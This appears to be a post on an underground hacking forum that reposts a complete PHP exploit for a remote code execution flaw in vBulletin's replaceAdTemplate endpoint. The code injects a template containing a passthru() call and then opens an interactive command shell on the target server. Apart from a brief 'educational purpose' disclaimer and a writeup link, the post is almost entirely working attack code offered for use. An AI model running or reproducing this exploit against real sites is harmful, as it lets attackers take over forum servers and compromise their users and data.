• XSS.stack #1 – первый литературный журнал от юзеров форума

Web vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability

Отслеживать
pianoxltd

pianoxltd

RAID-массив
Пользователь
Регистрация
24.09.2024
Сообщения
50
Реакции
19
Гарант сделки
3
vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability

PHP: 
<?php

/*
    -----------------------------------------------------------------
    vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability
    -----------------------------------------------------------------
    
    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://invisioncommunity.com
    
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] Technical Writeup:

    https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+---------------------------------------------------------------------+";
print "\n| vBulletin (replaceAdTemplate) Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
    print "\nUsage......: php $argv[0] <URL>\n";
    print "\nExample....: php $argv[0] http://localhost/vb/";
    print "\nExample....: php $argv[0] https://vbulletin.com/\n\n";
    die();
}

$params = [
        "routestring" => "ajax/api/ad/replaceAdTemplate",
        "styleid" => "1",
        "location" => "rce",
        "template" => "<vb:if condition='\"passthru\"(\$_POST[\"cmd\"])'></vb:if>"
];

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

if (curl_exec($ch) !== "null") die("\n[-] Exploit failed, unable to create template!\n\n");

$params = ["routestring" => "ajax/render/ad_rce"];

while (1)
{
    print "\nvBulletin-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $params["cmd"] = $cmd;
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
    preg_match('/(.+)\{"template":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх